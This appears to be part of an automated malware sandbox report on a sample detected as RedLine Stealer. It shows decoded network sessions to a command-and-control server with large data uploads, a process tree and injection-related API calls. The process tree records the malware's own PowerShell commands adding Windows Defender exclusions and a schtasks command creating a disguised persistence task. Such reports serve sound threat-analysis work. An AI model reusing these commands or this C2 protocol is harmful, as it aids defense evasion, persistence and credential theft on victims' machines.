                      Aug 30, 2024 08:02:22.471604109 CEST4972455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:22.471621990 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.471628904 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.471637011 CEST4972455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:22.471657038 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.471666098 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.471674919 CEST4972455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:22.471698999 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.471707106 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.471714020 CEST4972455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:22.471736908 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.471745014 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479904890 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479912043 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479921103 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479928017 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479958057 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479964972 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.480000019 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.480009079 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.480025053 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.480031967 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.480079889 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.480087996 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.480129004 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.480137110 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.480181932 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.480189085 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.527046919 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:24.338779926 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:24.351757050 CEST4972455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:24.351897001 CEST4972355615192.168.2.5185.222.57.91
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Aug 30, 2024 08:02:08.407766104 CEST | 65288 | 53 | 192.168.2.5 | 1.1.1.1
                      Aug 30, 2024 08:02:38.223860025 CEST | 53 | 56494 | 162.159.36.2 | 192.168.2.5
                      Aug 30, 2024 08:02:38.729798079 CEST | 53 | 58879 | 1.1.1.1 | 192.168.2.5
                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                      Aug 30, 2024 08:02:08.407766104 CEST | 192.168.2.5 | 1.1.1.1 | 0x84e0 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001) | false
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                      Aug 30, 2024 08:02:08.414952993 CEST | 1.1.1.1 | 192.168.2.5 | 0x84e0 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net |  | CNAME (Canonical name) | IN (0x0001) | false
                      • 185.222.57.91:55615
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.5 | 49711 | 185.222.57.91 | 55615 | 1492 | C:\Users\user\Desktop\tfF3UBTdr8.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 30, 2024 08:02:01.976151943 CEST | 240 | OUT | POST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                      Host: 185.222.57.91:55615
                      Content-Length: 137
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Connection: Keep-Alive
                      Aug 30, 2024 08:02:02.560324907 CEST | 25 | IN | HTTP/1.1 100 Continue
                      Aug 30, 2024 08:02:02.695832968 CEST | 359 | IN | HTTP/1.1 200 OK
                      Content-Length: 212
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Fri, 30 Aug 2024 06:02:01 GMT
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                      Aug 30, 2024 08:02:07.767960072 CEST | 223 | OUT | POST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                      Host: 185.222.57.91:55615
                      Content-Length: 144
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Aug 30, 2024 08:02:08.075649023 CEST | 25 | IN | HTTP/1.1 100 Continue
                      Aug 30, 2024 08:02:08.278203011 CEST | 1236 | IN | HTTP/1.1 200 OK
                      Content-Length: 6625
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Fri, 30 Aug 2024 06:02:08 GMT
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>202.10.61.127</b:string><b:string>183.155.33.34</b:string><b:string>103.138.49.24</b:string><b:string>36.26.100.62</b:string><b:string>49.89.92.98</b:string><b:string>183.208.114.83</b:string><b:string>139.186.206.86</b:string><b:string>49.74.245.112</b:string><b:string>183.151.6.172</b:string><b:string>91.192.81.11</b:string><b:string>222.247.0.195</b:string><b:string>115.150.176.197</b:string><b:string>116.4.200.54</b:string><b:string>13.89.107.79</b:string><b:string>58.253.61.2</b:string><b:string>119.126.114.250</b:string><b:string>34.141.245.25</b:string><b:string>20.99.160.173</b:string [TRUNCATED]


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      1 | 192.168.2.5 | 49714 | 185.222.57.91 | 55615 | 1492 | C:\Users\user\Desktop\tfF3UBTdr8.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 30, 2024 08:02:11.114465952 CEST | 221 | OUT | POST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                      Host: 185.222.57.91:55615
                      Content-Length: 953303
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Aug 30, 2024 08:02:12.654634953 CEST | 294 | IN | HTTP/1.1 200 OK
                      Content-Length: 147
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Fri, 30 Aug 2024 06:02:12 GMT
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                      Aug 30, 2024 08:02:12.656995058 CEST | 217 | OUT | POST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                      Host: 185.222.57.91:55615
                      Content-Length: 953295
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Aug 30, 2024 08:02:13.396997929 CEST | 408 | IN | HTTP/1.1 200 OK
                      Content-Length: 261
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Fri, 30 Aug 2024 06:02:12 GMT
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      2 | 192.168.2.5 | 49718 | 185.222.57.91 | 55615 | 6784 | C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 30, 2024 08:02:12.125240088 CEST | 240 | OUT | POST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                      Host: 185.222.57.91:55615
                      Content-Length: 137
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Connection: Keep-Alive
                      Aug 30, 2024 08:02:12.709861040 CEST | 359 | IN | HTTP/1.1 200 OK
                      Content-Length: 212
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Fri, 30 Aug 2024 06:02:12 GMT
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                      Aug 30, 2024 08:02:12.923157930 CEST | 359 | IN | HTTP/1.1 200 OK
                      Content-Length: 212
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Fri, 30 Aug 2024 06:02:12 GMT
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                      Aug 30, 2024 08:02:17.767611027 CEST | 223 | OUT | POST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                      Host: 185.222.57.91:55615
                      Content-Length: 144
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Aug 30, 2024 08:02:17.937657118 CEST | 25 | IN | HTTP/1.1 100 Continue
                      Aug 30, 2024 08:02:18.036274910 CEST | 1236 | IN | HTTP/1.1 200 OK
                      Content-Length: 6625
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Fri, 30 Aug 2024 06:02:17 GMT
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>202.10.61.127</b:string><b:string>183.155.33.34</b:string><b:string>103.138.49.24</b:string><b:string>36.26.100.62</b:string><b:string>49.89.92.98</b:string><b:string>183.208.114.83</b:string><b:string>139.186.206.86</b:string><b:string>49.74.245.112</b:string><b:string>183.151.6.172</b:string><b:string>91.192.81.11</b:string><b:string>222.247.0.195</b:string><b:string>115.150.176.197</b:string><b:string>116.4.200.54</b:string><b:string>13.89.107.79</b:string><b:string>58.253.61.2</b:string><b:string>119.126.114.250</b:string><b:string>34.141.245.25</b:string><b:string>20.99.160.173</b:string [TRUNCATED]


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      3 | 192.168.2.5 | 49723 | 185.222.57.91 | 55615 | 6784 | C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 30, 2024 08:02:20.458463907 CEST | 221 | OUT | POST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                      Host: 185.222.57.91:55615
                      Content-Length: 952830
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Aug 30, 2024 08:02:22.006684065 CEST | 294 | IN | HTTP/1.1 200 OK
                      Content-Length: 147
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Fri, 30 Aug 2024 06:02:21 GMT
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      4 | 192.168.2.5 | 49724 | 185.222.57.91 | 55615 | 6784 | C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 30, 2024 08:02:22.013967037 CEST | 241 | OUT | POST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                      Host: 185.222.57.91:55615
                      Content-Length: 952822
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Connection: Keep-Alive
                      Aug 30, 2024 08:02:24.338779926 CEST | 408 | IN | HTTP/1.1 200 OK
                      Content-Length: 261
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Fri, 30 Aug 2024 06:02:24 GMT
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                      Target ID:0
                      Start time:02:01:52
                      Start date:30/08/2024
                      Path:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\tfF3UBTdr8.exe"
                      Imagebase:0xd00000
                      File size:661'000 bytes
                      MD5 hash:05211F48DBBB4EF891DB1E158FF87E28
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:true

                      Target ID:3
                      Start time:02:01:58
                      Start date:30/08/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe"
                      Imagebase:0x550000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:4
                      Start time:02:01:58
                      Start date:30/08/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:5
                      Start time:02:01:58
                      Start date:30/08/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WltfeVzR.exe"
                      Imagebase:0x550000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:6
                      Start time:02:01:58
                      Start date:30/08/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:7
                      Start time:02:01:58
                      Start date:30/08/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp"
                      Imagebase:0x880000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:8
                      Start time:02:01:58
                      Start date:30/08/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:9
                      Start time:02:01:59
                      Start date:30/08/2024
                      Path:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\tfF3UBTdr8.exe"
                      Imagebase:0xe10000
                      File size:661'000 bytes
                      MD5 hash:05211F48DBBB4EF891DB1E158FF87E28
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:true

                      Target ID:10
                      Start time:02:01:59
                      Start date:30/08/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:11
                      Start time:02:02:00
                      Start date:30/08/2024
                      Path:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      Imagebase:0xc60000
                      File size:661'000 bytes
                      MD5 hash:05211F48DBBB4EF891DB1E158FF87E28
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Antivirus matches:
                      • Detection: 68%, ReversingLabs
                      • Detection: 45%, Virustotal, Browse
                      Reputation:low
                      Has exited:true

                      Target ID:12
                      Start time:02:02:01
                      Start date:30/08/2024
                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Imagebase:0x7ff6ef0c0000
                      File size:496'640 bytes
                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:13
                      Start time:02:02:08
                      Start date:30/08/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmpAD91.tmp"
                      Imagebase:0x880000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:14
                      Start time:02:02:09
                      Start date:30/08/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:16
                      Start time:02:02:09
                      Start date:30/08/2024
                      Path:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\WltfeVzR.exe"
                      Imagebase:0x890000
                      File size:661'000 bytes
                      MD5 hash:05211F48DBBB4EF891DB1E158FF87E28
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:17
                      Start time:02:02:09
                      Start date:30/08/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true


                        Execution Graph

                        Execution Coverage:12.7%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0.6%
                        Total number of Nodes:179
                        Total number of Limit Nodes:9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:

                        Control-flow Graph (node list omitted; first node 76b75b4)
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076B77F6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0

                        Control-flow Graph (node list omitted; first node 76b75c0)
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076B77F6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0

                        Control-flow Graph (node list omitted; first node 30def30)
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 030DF186
                        Memory Dump Source
                        • Source File: 00000000.00000002.2095838772.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_30d0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0

                        Control-flow Graph (node list omitted; first node 30d590c)
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 030D59C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2095838772.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_30d0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0

                        Control-flow Graph (node list omitted; first node 30d44b4)
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 030D59C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2095838772.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_30d0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0

                        Control-flow Graph (node list omitted; first node 76b7330)
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076B73C8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0

                        Control-flow Graph (node list omitted; first node 76b7420)
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076B74A8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0

                        Control-flow Graph (node list omitted; first node 76b7338)
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076B73C8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076B721E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076B74A8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076B721E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076B72E6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        APIs
